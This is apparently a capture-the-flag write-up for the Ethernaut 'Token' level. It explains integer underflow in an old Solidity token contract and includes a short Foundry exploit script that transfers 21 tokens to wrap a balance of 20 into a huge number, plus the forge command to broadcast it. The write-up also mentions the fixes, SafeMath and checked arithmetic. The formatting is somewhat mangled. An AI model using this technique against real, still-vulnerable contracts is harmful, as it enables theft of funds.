- in this challenge, we explore a classic vulnerability in both web2 and web3 security: integer overflows.
contract Token {
mapping(address => uint) balances;
uint public totalSupply;
constructor(uint _initialSupply) public {
balances[msg.sender] = totalSupply = _initialSupply;
}
function transfer(address _to, uint _value) public returns (bool) {
require(balances[msg.sender] - _value >= 0);
balances[msg.sender] -= _value;
balances[_to] += _value;
return true;
}
function balanceOf(address _owner) public view returns (uint balance) {
return balances[_owner];
}
}- programming languages that are not memory-managed can have their integer variables overflown if assigned to values larger than the variables' capacity limit.
- we will use this trick to overflow a
uintand bypass therequire()check ofToken()'stransfer()function:
- we will use this trick to overflow a
function transfer(address _to, uint _value) public returns (bool) {
require(balances[msg.sender] - _value >= 0);
balances[msg.sender] -= _value;
balances[_to] += _value;
return true;
}- whenever we add
1to a variable's maximum value, the value wraps around and decreases.- for example, an (unsigned)
uint8, has the maximum value of2^8 - 1 = 255. if we add1to it, it becomes0. same as2^256 - 1 + 1. - symmetrically, if we subtract a value larger than what the variable holds, the result wraps around from the other side, increasing the variable's value. this is our exploit.
- for example, an (unsigned)
- if we pass a
_valuetotransfer()that is larger than20, for instance1,balances[msg.sender] - _valueresults onuint256(-1), which is equal to a very large number,2^256 – 1.
- in solidity, this type of integer overflow used to be a vulnerability until version
0.8.0.- this is why contracts were advised to use OpenZeppelin'
SafeMath.solwhenever they performed integer operations. - in newer versions, if the code is not performing these operations, we can use
uncheckedto save gas.
- this is why contracts were advised to use OpenZeppelin'
- since this challenge is so easy, we skip tests and go directly to the submission script,
script/05/Token.s.sol:
contract Exploit is Script {
address instance = vm.envAddress("INSTANCE_LEVEL5");
address hacker = vm.rememberKey(vm.envUint("PRIVATE_KEY"));
Token level = Token(instance);
function run() external {
vm.startBroadcast(hacker);
level.transfer(address(0), 21);
vm.stopBroadcast();
}
}- running with:
> forge script ./script/05/Token.s.sol --broadcast -vvvv --rpc-url sepolia
